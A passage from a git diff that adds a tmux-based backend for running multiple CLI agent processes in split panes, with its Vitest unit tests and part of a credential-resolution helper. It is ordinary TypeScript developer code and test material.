Resolve a credential field (apiKey or baseUrl) with the following + * priority: explicit override → same-provider parent value → env var. + */ +function resolveCredentialField( + explicitValue: string | undefined, + inheritedValue: string | undefined, + authType: string, + field: 'apiKey' | 'baseUrl', +): string | undefined { + if (explicitValue) return explicitValue; + if (inheritedValue) return inheritedValue; + + const envMapping = + AUTH_ENV_MAPPINGS[authType as keyof typeof AUTH_ENV_MAPPINGS]; + if (!envMapping) return undefined; + + for (const envKey of envMapping[field]) { + const value = process.env[envKey]; + if (value) return value; + } + return undefined; +} diff --git a/packages/core/src/agents/backends/TmuxBackend.test.ts b/packages/core/src/agents/backends/TmuxBackend.test.ts new file mode 100644 index 000000000..39a96785d --- /dev/null +++ b/packages/core/src/agents/backends/TmuxBackend.test.ts @@ -0,0 +1,482 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; +import type { AgentSpawnConfig } from './types.js'; + +// ─── Hoisted mocks for tmux-commands ──────────────────────────── +const hoistedVerifyTmux = vi.hoisted(() => vi.fn()); +const hoistedTmuxCurrentPaneId = vi.hoisted(() => vi.fn()); +const hoistedTmuxCurrentWindowTarget = vi.hoisted(() => vi.fn()); +const hoistedTmuxHasSession = vi.hoisted(() => vi.fn()); +const hoistedTmuxHasWindow = vi.hoisted(() => vi.fn()); +const hoistedTmuxNewSession = vi.hoisted(() => vi.fn()); +const hoistedTmuxNewWindow = vi.hoisted(() => vi.fn()); +const hoistedTmuxSplitWindow = vi.hoisted(() => vi.fn()); +const hoistedTmuxSendKeys = vi.hoisted(() => vi.fn()); +const hoistedTmuxSelectPane = vi.hoisted(() => vi.fn()); +const hoistedTmuxSelectPaneTitle = vi.hoisted(() => vi.fn()); +const hoistedTmuxSelectPaneStyle = vi.hoisted(() => vi.fn()); +const hoistedTmuxSelectLayout = vi.hoisted(() => vi.fn()); +const hoistedTmuxListPanes = vi.hoisted(() => vi.fn()); +const hoistedTmuxSetOption = vi.hoisted(() => vi.fn()); +const hoistedTmuxRespawnPane = vi.hoisted(() => vi.fn()); +const hoistedTmuxKillPane = vi.hoisted(() => vi.fn()); +const hoistedTmuxKillSession = vi.hoisted(() => vi.fn()); +const hoistedTmuxResizePane = vi.hoisted(() => vi.fn()); +const hoistedTmuxGetFirstPaneId = vi.hoisted(() => vi.fn()); + +vi.mock('./tmux-commands.js', () => ({ + verifyTmux: hoistedVerifyTmux, + tmuxCurrentPaneId: hoistedTmuxCurrentPaneId, + tmuxCurrentWindowTarget: hoistedTmuxCurrentWindowTarget, + tmuxHasSession: hoistedTmuxHasSession, + tmuxHasWindow: hoistedTmuxHasWindow, + tmuxNewSession: hoistedTmuxNewSession, + tmuxNewWindow: hoistedTmuxNewWindow, + tmuxSplitWindow: hoistedTmuxSplitWindow, + tmuxSendKeys: hoistedTmuxSendKeys, + tmuxSelectPane: hoistedTmuxSelectPane, + tmuxSelectPaneTitle: hoistedTmuxSelectPaneTitle, + tmuxSelectPaneStyle: hoistedTmuxSelectPaneStyle, + tmuxSelectLayout: hoistedTmuxSelectLayout, + tmuxListPanes: hoistedTmuxListPanes, + tmuxSetOption: hoistedTmuxSetOption, + tmuxRespawnPane: hoistedTmuxRespawnPane, + tmuxKillPane: hoistedTmuxKillPane, + tmuxKillSession: hoistedTmuxKillSession, + tmuxResizePane: hoistedTmuxResizePane, + tmuxGetFirstPaneId: hoistedTmuxGetFirstPaneId, +})); + +// Mock the debug logger +vi.mock('../../utils/debugLogger.js', () => ({ + createDebugLogger: () => ({ + info: vi.fn(), + error: vi.fn(), + warn: vi.fn(), + }), +})); + +import { TmuxBackend } from './TmuxBackend.js'; + +function makeConfig( + agentId: string, + overrides?: Partial, +): AgentSpawnConfig { + return { + agentId, + command: '/usr/bin/node', + args: ['agent.js'], + cwd: '/tmp/test', + ...overrides, + }; +} + +/** + * Spawn an agent with fake timers active. The `sleep()` inside + * `spawnAgentAsync` uses `setTimeout`, so we must advance fake timers + * while the spawn promise is pending. + */ +async function spawnWithTimers( + backend: TmuxBackend, + config: AgentSpawnConfig, +): Promise { + const promise = backend.spawnAgent(config); + // Advance past INTERNAL_LAYOUT_SETTLE_MS (200) / EXTERNAL_LAYOUT_SETTLE_MS (120) + // and the 100ms triggerMainProcessRedraw timeout + await vi.advanceTimersByTimeAsync(300); + await promise; +} + +function setupDefaultMocks(): void { + hoistedVerifyTmux.mockResolvedValue(undefined); + hoistedTmuxHasSession.mockResolvedValue(false); + hoistedTmuxHasWindow.mockResolvedValue(false); + hoistedTmuxNewSession.mockResolvedValue(undefined); + hoistedTmuxNewWindow.mockResolvedValue(undefined); + hoistedTmuxGetFirstPaneId.mockResolvedValue('%0'); + hoistedTmuxRespawnPane.mockResolvedValue(undefined); + hoistedTmuxSplitWindow.mockResolvedValue('%1'); + hoistedTmuxSetOption.mockResolvedValue(undefined); + hoistedTmuxSelectPaneTitle.mockResolvedValue(undefined); + hoistedTmuxSelectPaneStyle.mockResolvedValue(undefined); + hoistedTmuxSelectLayout.mockResolvedValue(undefined); + hoistedTmuxSelectPane.mockResolvedValue(undefined); + hoistedTmuxResizePane.mockResolvedValue(undefined); + hoistedTmuxListPanes.mockResolvedValue([]); + hoistedTmuxSendKeys.mockResolvedValue(undefined); + hoistedTmuxKillPane.mockResolvedValue(undefined); + hoistedTmuxKillSession.mockResolvedValue(undefined); + hoistedTmuxCurrentPaneId.mockResolvedValue('%0'); + hoistedTmuxCurrentWindowTarget.mockResolvedValue('main:0'); +} + +describe('TmuxBackend', () => { + let backend: TmuxBackend; + let savedTmuxEnv: string | undefined; + + beforeEach(() => { + vi.useFakeTimers(); + savedTmuxEnv = process.env['TMUX']; + // Default: running outside tmux + delete process.env['TMUX']; + setupDefaultMocks(); + backend = new TmuxBackend(); + }); + + afterEach(async () => { + await backend.cleanup(); + vi.restoreAllMocks(); + vi.useRealTimers(); + if (savedTmuxEnv !== undefined) { + process.env['TMUX'] = savedTmuxEnv; + } else { + delete process.env['TMUX']; + } + }); + + // ─── Initialization ───────────────────────────────────────── + + it('throws if spawnAgent is called before init', async () => { + await expect(backend.spawnAgent(makeConfig('a1'))).rejects.toThrow( + 'not initialized', + ); + }); + + it('init verifies tmux availability', async () => { + await backend.init(); + expect(hoistedVerifyTmux).toHaveBeenCalled(); + }); + + it('init is idempotent', async () => { + await backend.init(); + await backend.init(); + expect(hoistedVerifyTmux).toHaveBeenCalledTimes(1); + }); + + // ─── Spawning (outside tmux) ────────────────────────────── + + it('spawns first agent outside tmux by respawning the initial pane', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('agent-1')); + + expect(hoistedTmuxNewSession).toHaveBeenCalled(); + expect(hoistedTmuxRespawnPane).toHaveBeenCalledWith( + '%0', + expect.any(String), + expect.any(String), + ); + expect(backend.getActiveAgentId()).toBe('agent-1'); + }); + + it('spawns second agent outside tmux by splitting', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('agent-1')); + + // For second agent, list-panes returns the first agent pane + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + hoistedTmuxSplitWindow.mockResolvedValue('%2'); + + await spawnWithTimers(backend, makeConfig('agent-2')); + + expect(hoistedTmuxSplitWindow).toHaveBeenCalled(); + }); + + it('rejects duplicate agent IDs', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('dup')); + + await expect(backend.spawnAgent(makeConfig('dup'))).rejects.toThrow( + 'already exists', + ); + }); + + // ─── Spawning (inside tmux) ─────────────────────────────── + + it('spawns first agent inside tmux by splitting from main pane', async () => { + process.env['TMUX'] = '/tmp/tmux-1000/default,12345,0'; + backend = new TmuxBackend(); + await backend.init(); + + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + hoistedTmuxSplitWindow.mockResolvedValue('%1'); + + await spawnWithTimers(backend, makeConfig('agent-1')); + + // Should have split horizontally with firstSplitPercent + expect(hoistedTmuxSplitWindow).toHaveBeenCalledWith( + '%0', + expect.objectContaining({ horizontal: true, percent: 70 }), + ); + // Should refocus on main pane (inside tmux, no server name arg) + expect(hoistedTmuxSelectPane).toHaveBeenCalledWith('%0'); + }); + + // ─── Navigation ─────────────────────────────────────────── + + it('switchTo changes active agent', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + hoistedTmuxSplitWindow.mockResolvedValue('%2'); + await spawnWithTimers(backend, makeConfig('b')); + + backend.switchTo('b'); + expect(backend.getActiveAgentId()).toBe('b'); + }); + + it('switchTo throws for unknown agent', async () => { + await backend.init(); + expect(() => backend.switchTo('ghost')).toThrow('not found'); + }); + + it('switchToNext and switchToPrevious cycle correctly', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + hoistedTmuxSplitWindow.mockResolvedValue('%2'); + await spawnWithTimers(backend, makeConfig('b')); + + expect(backend.getActiveAgentId()).toBe('a'); + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('b'); + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('a'); + backend.switchToPrevious(); + expect(backend.getActiveAgentId()).toBe('b'); + }); + + it('switchToNext does nothing with a single agent', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('solo')); + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('solo'); + }); + + // ─── Stop & Cleanup ────────────────────────────────────── + + it('stopAgent kills the pane', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + backend.stopAgent('a'); + expect(hoistedTmuxKillPane).toHaveBeenCalledWith('%0', expect.any(String)); + }); + + it('stopAll kills all running panes', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + hoistedTmuxSplitWindow.mockResolvedValue('%2'); + await spawnWithTimers(backend, makeConfig('b')); + + backend.stopAll(); + // Should have killed both panes + expect(hoistedTmuxKillPane).toHaveBeenCalledTimes(2); + }); + + it('cleanup kills panes and the external session', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + await backend.cleanup(); + + expect(hoistedTmuxKillPane).toHaveBeenCalledWith('%0', expect.any(String)); + expect(hoistedTmuxKillSession).toHaveBeenCalled(); + expect(backend.getActiveAgentId()).toBeNull(); + }); + + it('cleanup does not kill session when running inside tmux', async () => { + process.env['TMUX'] = '/tmp/tmux-1000/default,12345,0'; + backend = new TmuxBackend(); + await backend.init(); + + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + hoistedTmuxSplitWindow.mockResolvedValue('%1'); + await spawnWithTimers(backend, makeConfig('a')); + + hoistedTmuxKillSession.mockClear(); + await backend.cleanup(); + + expect(hoistedTmuxKillSession).not.toHaveBeenCalled(); + }); + + // ─── Exit Detection (Bug #1: missing pane → exited) ────── + + it('marks agent as exited when pane disappears from tmux', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + // Polling returns no panes → agent's pane is gone + hoistedTmuxListPanes.mockResolvedValue([]); + + // Advance timer to trigger poll + await vi.advanceTimersByTimeAsync(600); + + expect(exitCallback).toHaveBeenCalledWith('a', 1, null); + }); + + it('marks agent as exited when pane reports dead', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + // Polling returns the pane as dead with exit code 42 + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: true, deadStatus: 42 }, + ]); + + await vi.advanceTimersByTimeAsync(600); + + expect(exitCallback).toHaveBeenCalledWith('a', 42, null); + }); + + // ─── waitForAll (Bug #3: cleanup resolves waiters) ──────── + + it('waitForAll resolves when all agents exit', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: true, deadStatus: 0 }, + ]); + + const waitPromise = backend.waitForAll(); + + await vi.advanceTimersByTimeAsync(600); + + const result = await waitPromise; + expect(result).toBe(true); + }); + + it('waitForAll resolves after cleanup is called', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + // Pane stays alive — without cleanup, waitForAll would hang + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + + const waitPromise = backend.waitForAll(); + + // Advance a bit (poll runs but agent still alive) + await vi.advanceTimersByTimeAsync(600); + + // Now cleanup + await backend.cleanup(); + + // Advance again so the waitForAll interval fires + await vi.advanceTimersByTimeAsync(600); + + const result = await waitPromise; + // The key thing is the promise resolves instead of hanging forever. + // allExited() returns true since panes were cleared in cleanup. + expect(result).toBe(true); + }); + + it('waitForAll returns false on timeout', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + // Pane stays alive + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + + const waitPromise = backend.waitForAll(1000); + + await vi.advanceTimersByTimeAsync(1100); + + const result = await waitPromise; + expect(result).toBe(false); + }); + + // ─── Input ──────────────────────────────────────────────── + + it('forwardInput sends literal keys to active agent pane', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + const result = backend.forwardInput('hello'); + expect(result).toBe(true); + expect(hoistedTmuxSendKeys).toHaveBeenCalledWith( + '%0', + 'hello', + { literal: true }, + expect.any(String), + ); + }); + + it('forwardInput returns false with no active agent', async () => { + await backend.init(); + expect(backend.forwardInput('hello')).toBe(false); + }); + + // ─── Snapshots ──────────────────────────────────────────── + + it('getActiveSnapshot returns null (tmux handles rendering)', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + expect(backend.getActiveSnapshot()).toBeNull(); + }); + + it('getAgentScrollbackLength returns 0', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + expect(backend.getAgentScrollbackLength('a')).toBe(0); + }); + + // ─── getAttachHint ──────────────────────────────────────── + + it('returns attach command when outside tmux', async () => { + await backend.init(); + const hint = backend.getAttachHint(); + expect(hint).toMatch(/^tmux -L arena-server-\d+ a$/); + }); + + it('returns null when inside tmux', async () => { + process.env['TMUX'] = '/tmp/tmux-1000/default,12345,0'; + backend = new TmuxBackend(); + await backend.init(); + expect(backend.getAttachHint()).toBeNull(); + }); + + // ─── Spawn failure handling ─────────────────────────────── + + it('registers failed agent and fires exit callback on spawn error', async () => { + await backend.init(); + + // Make the external session setup fail + hoistedTmuxHasSession.mockRejectedValueOnce(new Error('tmux exploded')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + await spawnWithTimers(backend, makeConfig('fail')); + + expect(exitCallback).toHaveBeenCalledWith('fail', 1, null); + }); +}); diff --git a/packages/core/src/agents/backends/TmuxBackend.ts b/packages/core/src/agents/backends/TmuxBackend.ts new file mode 100644 index 000000000..adc75593f --- /dev/null +++ b/packages/core/src/agents/backends/TmuxBackend.ts @@ -0,0 +1,813 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview TmuxBackend implements Backend using tmux split-pane. + * + * Layout (inside tmux): main process on the left (leader pane ~30%), + * agent panes on the right, arranged via `main-vertical`. + * + * ┌────────────┬──────────────────────────────────┐ + * │ │ Agent 1 │ + * │ Leader ├──────────────────────────────────┤ + * │ (30%) │ Agent 2 │ + * │ ├──────────────────────────────────┤ + * │ │ Agent 3 │ + * └────────────┴──────────────────────────────────┘ + * + * Outside tmux: a dedicated tmux server is created and panes are arranged + * using `tiled` layout in a separate session/window. + */ + +import { createDebugLogger } from '../../utils/debugLogger.js'; +import type { AnsiOutput } from '../../utils/terminalSerializer.js'; +import { DISPLAY_MODE } from './types.js'; +import type { AgentSpawnConfig, AgentExitCallback, Backend } from './types.js'; +import { + verifyTmux, + tmuxCurrentWindowTarget, + tmuxCurrentPaneId, + tmuxHasSession, + tmuxHasWindow, + tmuxNewSession, + tmuxNewWindow, + tmuxSplitWindow, + tmuxSendKeys, + tmuxSelectPane, + tmuxSelectPaneTitle, + tmuxSelectPaneStyle, + tmuxSelectLayout, + tmuxListPanes, + tmuxSetOption, + tmuxRespawnPane, + tmuxKillPane, + tmuxKillSession, + tmuxResizePane, + tmuxGetFirstPaneId, + type TmuxPaneInfo, +} from './tmux-commands.js'; + +const debugLogger = createDebugLogger('TMUX_BACKEND'); + +/** Polling interval for exit detection (ms) */ +const EXIT_POLL_INTERVAL_MS = 500; + +/** Default tmux server name prefix (for -L) when running outside tmux. + * Actual name is `${prefix}-${process.pid}` so each leader process is isolated. */ +const TMUX_SERVER_PREFIX = 'arena-server'; +/** Default tmux session name when running outside tmux */ +const DEFAULT_TMUX_SESSION = 'arena-view'; +/** Default tmux window name when running outside tmux */ +const DEFAULT_TMUX_WINDOW = 'arena-view'; +/** Default leader pane width percent (main pane) */ +const DEFAULT_LEADER_WIDTH_PERCENT = 30; +/** Default first split percent (right side) */ +const DEFAULT_FIRST_SPLIT_PERCENT = 70; +/** Default pane border format */ +const DEFAULT_PANE_BORDER_FORMAT = '#{pane_title}'; +/** Layout settle delays */ +const INTERNAL_LAYOUT_SETTLE_MS = 200; +const EXTERNAL_LAYOUT_SETTLE_MS = 120; + +interface TmuxAgentPane { + agentId: string; + paneId: string; + status: 'running' | 'exited'; + exitCode: number; +} + +interface ResolvedTmuxOptions { + serverName: string; + sessionName: string; + windowName: string; + paneTitle: string; + paneBorderStyle?: string; + paneActiveBorderStyle?: string; + paneBorderFormat: string; + paneBorderStatus?: 'top' | 'bottom' | 'off'; + leaderPaneWidthPercent: number; + firstSplitPercent: number; +} + +export class TmuxBackend implements Backend { + readonly type = DISPLAY_MODE.TMUX; + + /** The pane ID where the main process runs (left side) */ + private mainPaneId = ''; + /** Window target (session:window) */ + private windowTarget = ''; + /** Whether we are running inside tmux */ + private insideTmux = false; + /** External tmux server name (when outside tmux) */ + private serverName: string | null = null; + /** External tmux session name (when outside tmux) */ + private sessionName: string | null = null; + /** External tmux window name (when outside tmux) */ + private windowName: string | null = null; + + private panes: Map = new Map(); + private agentOrder: string[] = []; + private activeAgentId: string | null = null; + private onExitCallback: AgentExitCallback | null = null; + private exitPollTimer: NodeJS.Timeout | null = null; + private initialized = false; + /** Whether cleanup() has been called */ + private cleanedUp = false; + /** Number of agents currently being spawned asynchronously */ + private pendingSpawns = 0; + /** Queue to serialize spawn operations (prevents race conditions) */ + private spawnQueue: Promise = Promise.resolve(); + async init(): Promise { + if (this.initialized) return; + + // Verify tmux is available and version is sufficient + await verifyTmux(); + + this.insideTmux = Boolean(process.env['TMUX']); + + if (this.insideTmux) { + // Get the current pane ID (this is where the main process runs) + this.mainPaneId = await tmuxCurrentPaneId(); + this.windowTarget = await tmuxCurrentWindowTarget(); + debugLogger.info( + `Initialized inside tmux: pane ${this.mainPaneId}, window ${this.windowTarget}`, + ); + } else { + debugLogger.info( + 'Initialized outside tmux; will use external tmux server', + ); + } + + this.initialized = true; + } + + // ─── Agent Lifecycle ──────────────────────────────────────── + + async spawnAgent(config: AgentSpawnConfig): Promise { + if (!this.initialized) { + throw new Error('TmuxBackend not initialized. Call init() first.'); + } + if (this.panes.has(config.agentId)) { + throw new Error(`Agent "${config.agentId}" already exists.`); + } + + // Build the shell command string for the agent + const cmd = this.buildShellCommand(config); + + // Track pending spawn so waitForAll/allExited don't return + // prematurely before the pane is registered. + this.pendingSpawns++; + + // Chain spawn operations to ensure they run sequentially. + // This prevents race conditions where multiple agents all see + // panes.size === 0 and try to split from mainPaneId. + const spawnPromise = this.spawnQueue.then(() => + this.spawnAgentAsync(config, cmd), + ); + this.spawnQueue = spawnPromise; + + // Wait for this specific spawn to complete + await spawnPromise; + } + + private async spawnAgentAsync( + config: AgentSpawnConfig, + cmd: string, + ): Promise { + const { agentId } = config; + const options = this.resolveTmuxOptions(config); + + debugLogger.info( + `[spawnAgentAsync] Starting spawn for agent "${agentId}", mainPane="${this.mainPaneId}", currentPanesCount=${this.panes.size}`, + ); + try { + let paneId = ''; + if (this.insideTmux) { + paneId = await this.spawnInsideTmux(cmd, options); + } else { + paneId = await this.spawnOutsideTmux(config, cmd, options); + } + + const serverName = this.getServerName(); + + // Set remain-on-exit so we can detect when the process exits + await tmuxSetOption(paneId, 'remain-on-exit', 'on', serverName); + + // Apply pane title/border styling + await this.applyPaneDecorations(paneId, options, serverName); + + if (this.insideTmux) { + await this.applyInsideLayout(options); + await this.sleep(INTERNAL_LAYOUT_SETTLE_MS); + // Keep focus on the main pane + await tmuxSelectPane(this.mainPaneId); + this.triggerMainProcessRedraw(); + } else { + await this.applyExternalLayout(serverName); + await this.sleep(EXTERNAL_LAYOUT_SETTLE_MS); + } + + const agentPane: TmuxAgentPane = { + agentId, + paneId, + status: 'running', + exitCode: 0, + }; + + this.panes.set(agentId, agentPane); + this.agentOrder.push(agentId); + + // First agent becomes active + if (this.activeAgentId === null) { + this.activeAgentId = agentId; + } + + // Start exit polling if not already running + this.startExitPolling(); + + debugLogger.info( + `[spawnAgentAsync] Spawned agent "${agentId}" in pane ${paneId} — SUCCESS`, + ); + } catch (error) { + debugLogger.error( + `[spawnAgentAsync] Failed to spawn agent "${agentId}":`, + error, + ); + // Still register the agent as failed so exit callback fires + this.panes.set(agentId, { + agentId, + paneId: '', + status: 'exited', + exitCode: 1, + }); + this.agentOrder.push(agentId); + this.onExitCallback?.(agentId, 1, null); + } finally { + this.pendingSpawns--; + } + } + + /** + * Trigger terminal redraw in main process after pane layout changes. + * Uses multiple methods to ensure Ink picks up the new terminal size. + */ + private triggerMainProcessRedraw(): void { + if (!this.insideTmux) return; + // Small delay to let tmux finish the resize operation + setTimeout(() => { + try { + // Method 1: Emit resize event on stdout (Ink listens to this) + if (process.stdout.isTTY) { + process.stdout.emit('resize'); + debugLogger.info( + '[triggerMainProcessRedraw] Emitted stdout resize event', + ); + } + + // Method 2: Send SIGWINCH signal + process.kill(process.pid, 'SIGWINCH'); + debugLogger.info('[triggerMainProcessRedraw] Sent SIGWINCH'); + } catch (error) { + debugLogger.info(`[triggerMainProcessRedraw] Failed: ${error}`); + } + }, 100); + } + + stopAgent(agentId: string): void { + const pane = this.panes.get(agentId); + if (!pane || pane.status !== 'running') return; + // Kill the pane outright — a single Ctrl-C only cancels the current + // turn in interactive CLI agents and does not reliably exit the process. + if (pane.paneId) { + void tmuxKillPane(pane.paneId, this.getServerName()); + } + pane.status = 'exited'; + debugLogger.info(`Killed pane for agent "${agentId}"`); + } + + stopAll(): void { + for (const [agentId, pane] of this.panes.entries()) { + if (pane.status === 'running') { + if (pane.paneId) { + void tmuxKillPane(pane.paneId, this.getServerName()); + } + pane.status = 'exited'; + debugLogger.info(`Killed pane for agent "${agentId}"`); + } + } + } + + async cleanup(): Promise { + this.cleanedUp = true; + this.stopExitPolling(); + + // Kill all agent panes (but not the main pane) + for (const pane of this.panes.values()) { + if (pane.paneId) { + try { + await tmuxKillPane(pane.paneId, this.getServerName()); + debugLogger.info(`Killed agent pane ${pane.paneId}`); + } catch (_error) { + // Pane may already be gone + debugLogger.info( + `Failed to kill pane ${pane.paneId} (may already be gone)`, + ); + } + } + } + + // Kill the external tmux session/server if we created one + if (!this.insideTmux && this.sessionName && this.serverName) { + try { + await tmuxKillSession(this.sessionName, this.serverName); + debugLogger.info( + `Killed external tmux session "${this.sessionName}" on server "${this.serverName}"`, + ); + } catch (_error) { + debugLogger.info( + `Failed to kill external tmux session (may already be gone)`, + ); + } + } + + this.panes.clear(); + this.agentOrder = []; + this.activeAgentId = null; + this.serverName = null; + this.sessionName = null; + this.windowName = null; + this.windowTarget = ''; + this.mainPaneId = ''; + } + + setOnAgentExit(callback: AgentExitCallback): void { + this.onExitCallback = callback; + } + + async waitForAll(timeoutMs?: number): Promise { + if (this.allExited() || this.cleanedUp) return this.allExited(); + + return new Promise((resolve) => { + let timeoutHandle: NodeJS.Timeout | undefined; + + const checkInterval = setInterval(() => { + if (this.allExited() || this.cleanedUp) { + clearInterval(checkInterval); + if (timeoutHandle) clearTimeout(timeoutHandle); + resolve(this.allExited()); + } + }, EXIT_POLL_INTERVAL_MS); + + if (timeoutMs !== undefined) { + timeoutHandle = setTimeout(() => { + clearInterval(checkInterval); + resolve(false); + }, timeoutMs); + } + }); + } + + // ─── Active Agent & Navigation ────────────────────────────── + + switchTo(agentId: string): void { + if (!this.panes.has(agentId)) { + throw new Error(`Agent "${agentId}" not found.`); + } + const pane = this.panes.get(agentId)!; + this.activeAgentId = agentId; + void tmuxSelectPane(pane.paneId, this.getServerName()); + } + + switchToNext(): void { + if (this.agentOrder.length <= 1) return; + const currentIndex = this.agentOrder.indexOf(this.activeAgentId ?? ''); + const nextIndex = (currentIndex + 1) % this.agentOrder.length; + this.switchTo(this.agentOrder[nextIndex]!); + } + + switchToPrevious(): void { + if (this.agentOrder.length <= 1) return; + const currentIndex = this.agentOrder.indexOf(this.activeAgentId ?? ''); + const prevIndex = + (currentIndex - 1 + this.agentOrder.length) % this.agentOrder.length; + this.switchTo(this.agentOrder[prevIndex]!); + } + + getActiveAgentId(): string | null { + return this.activeAgentId; + } + + // ─── Screen Capture ───────────────────────────────────────── + + getActiveSnapshot(): AnsiOutput | null { + if (!this.activeAgentId) return null; + return this.getAgentSnapshot(this.activeAgentId); + } + + getAgentSnapshot( + agentId: string, + _scrollOffset: number = 0, + ): AnsiOutput | null { + // tmux panes are rendered by tmux itself. capture-pane is available + // but returns raw text. For the progress bar we don't need snapshots; + // full rendering is handled by tmux directly. + // Return null — the UI doesn't use snapshots for split-pane backends. + return null; + } + + getAgentScrollbackLength(_agentId: string): number { + // Scrollback is managed by tmux, not by us + return 0; + } + + // ─── Input ────────────────────────────────────────────────── + + forwardInput(data: string): boolean { + if (!this.activeAgentId) return false; + return this.writeToAgent(this.activeAgentId, data); + } + + writeToAgent(agentId: string, data: string): boolean { + const pane = this.panes.get(agentId); + if (!pane || pane.status !== 'running') return false; + void tmuxSendKeys( + pane.paneId, + data, + { literal: true }, + this.getServerName(), + ); + return true; + } + + // ─── Resize ───────────────────────────────────────────────── + + resizeAll(_cols: number, _rows: number): void { + // tmux manages pane sizes automatically based on the terminal window + } + + // ─── External Session Info ───────────────────────────────── + + getAttachHint(): string | null { + if (this.insideTmux) { + return null; + } + // When outside tmux, the server name is determined at init time + // (per-process unique). Return the attach command even before + // ensureExternalSession runs, since the server name is deterministic. + const server = this.serverName ?? `${TMUX_SERVER_PREFIX}-${process.pid}`; + return `tmux -L ${server} a`; + } + + // ─── Private ──────────────────────────────────────────────── + + private resolveTmuxOptions(config: AgentSpawnConfig): ResolvedTmuxOptions { + const opts = config.backend?.tmux ?? {}; + return { + serverName: opts.serverName ?? `${TMUX_SERVER_PREFIX}-${process.pid}`, + sessionName: opts.sessionName ?? DEFAULT_TMUX_SESSION, + windowName: opts.windowName ?? DEFAULT_TMUX_WINDOW, + paneTitle: opts.paneTitle ?? config.agentId, + paneBorderStyle: opts.paneBorderStyle, + paneActiveBorderStyle: opts.paneActiveBorderStyle, + paneBorderFormat: opts.paneBorderFormat ?? DEFAULT_PANE_BORDER_FORMAT, + paneBorderStatus: + opts.paneBorderStatus ?? (this.insideTmux ? undefined : 'top'), + leaderPaneWidthPercent: + opts.leaderPaneWidthPercent ?? DEFAULT_LEADER_WIDTH_PERCENT, + firstSplitPercent: opts.firstSplitPercent ?? DEFAULT_FIRST_SPLIT_PERCENT, + }; + } + + private getServerName(): string | undefined { + return this.insideTmux ? undefined : (this.serverName ?? undefined); + } + + private async ensureExternalSession( + config: AgentSpawnConfig, + options: ResolvedTmuxOptions, + ): Promise { + if ( + this.windowTarget && + this.serverName && + this.sessionName && + this.windowName + ) { + return; + } + + this.serverName = options.serverName; + this.sessionName = options.sessionName; + this.windowName = options.windowName; + + const serverName = this.serverName; + const sessionExists = await tmuxHasSession(this.sessionName, serverName); + + if (!sessionExists) { + await tmuxNewSession( + this.sessionName, + { + cols: config.cols, + rows: config.rows, + windowName: this.windowName, + }, + serverName, + ); + } + + const windowExists = sessionExists + ? await tmuxHasWindow(this.sessionName, this.windowName, serverName) + : true; + + if (!windowExists) { + await tmuxNewWindow(this.sessionName, this.windowName, serverName); + } + + this.windowTarget = `${this.sessionName}:${this.windowName}`; + + if (!this.mainPaneId) { + this.mainPaneId = await tmuxGetFirstPaneId(this.windowTarget, serverName); + } + } + + private async spawnInsideTmux( + cmd: string, + options: ResolvedTmuxOptions, + ): Promise { + if (!this.windowTarget) { + throw new Error('Tmux window target not initialized.'); + } + + const panes = await tmuxListPanes(this.windowTarget); + const paneCount = panes.length; + if (paneCount === 1) { + debugLogger.info( + `[spawnInsideTmux] First agent — split -h -l ${options.firstSplitPercent}% from ${this.mainPaneId}`, + ); + return await tmuxSplitWindow(this.mainPaneId, { + horizontal: true, + percent: options.firstSplitPercent, + command: cmd, + }); + } + + const splitTarget = this.pickMiddlePane(panes).paneId; + const horizontal = this.shouldSplitHorizontally(paneCount); + debugLogger.info( + `[spawnInsideTmux] Split from middle pane ${splitTarget} (${paneCount} panes, ${horizontal ? 'horizontal' : 'vertical'})`, + ); + return await tmuxSplitWindow(splitTarget, { + horizontal, + command: cmd, + }); + } + + private async spawnOutsideTmux( + config: AgentSpawnConfig, + cmd: string, + options: ResolvedTmuxOptions, + ): Promise { + await this.ensureExternalSession(config, 